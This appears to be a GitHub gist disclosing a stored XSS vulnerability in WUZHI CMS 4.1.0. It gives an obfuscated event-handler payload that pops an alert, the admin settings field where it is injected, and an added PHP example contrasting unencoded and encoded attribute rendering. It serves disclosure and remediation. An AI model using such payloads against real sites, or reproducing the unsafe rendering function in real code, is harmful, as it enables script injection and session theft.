@feixuezhi
Last active July 31, 2019 08:32
wuzhicms v4.1.0 persistent xss vulnerability
A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0.
The vulnerability allows remote attackers to inject arbitrary web script or HTML.
POC
"> <details/open
/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
http://localhost/index.php?m=core&f=index&_su=wuzhicms. When an attacker goes to system settings - mail server - mail server - mailbox username and writes the PoC content there, the XSS vulnerability is triggered successfully.
1. Choose this part and write the PoC into [mailbox username].
2. Submit and view the web page.
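The PoC opens with `">`, which suggests the stored mailbox username is written back into a double-quoted HTML attribute without encoding. The following is an added example, not WUZHI CMS source code (the function names and the `smtp_user` field name are hypothetical), contrasting that pattern with attribute-context encoding at render time, with the page's PoC string as input:

```php
<?php
// Added illustration, not WUZHI CMS source: function and field names are hypothetical.

// Vulnerable pattern: the stored setting is concatenated into the attribute as-is.
function render_unsafe(string $stored): string
{
    return '<input type="text" name="smtp_user" value="' . $stored . '">';
}

// Hardened pattern: encode for the HTML attribute context when rendering.
function render_safe(string $stored): string
{
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="smtp_user" value="' . $encoded . '">';
}

// Counts tag openings in rendered markup; the form field alone should yield 1.
function count_tags(string $html): int
{
    return (int) preg_match_all('/<[a-z]/i', $html);
}

// Optional input-side check (assumed policy: the username is an e-mail address
// or a simple account name). It complements output encoding, never replaces it.
// The D modifier stops "$" from matching before a trailing newline.
function is_plausible_mailbox_user(string $value): bool
{
    return (bool) preg_match('/^[A-Za-z0-9._%+-]{1,64}(@[A-Za-z0-9.-]{1,255})?$/D', $value);
}

// The PoC string from this page, used as test input.
$poc = '"> <details/open' . "\n"
     . '/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)'
     . '+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)'
     . '+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>';

foreach (['unsafe' => render_unsafe($poc), 'safe' => render_safe($poc)] as $label => $html) {
    printf("%-6s tags=%d\n%s\n\n", $label, count_tags($html), $html);
}

foreach ([$poc, 'noreply@example.com'] as $candidate) {
    $verdict = is_plausible_mailbox_user($candidate) ? 'accept' : 'reject';
    printf("%s => %s\n", json_encode($candidate), $verdict);
}
```

Because the value is stored, encoding has to happen on every page that renders it, not only on the settings form that accepted it.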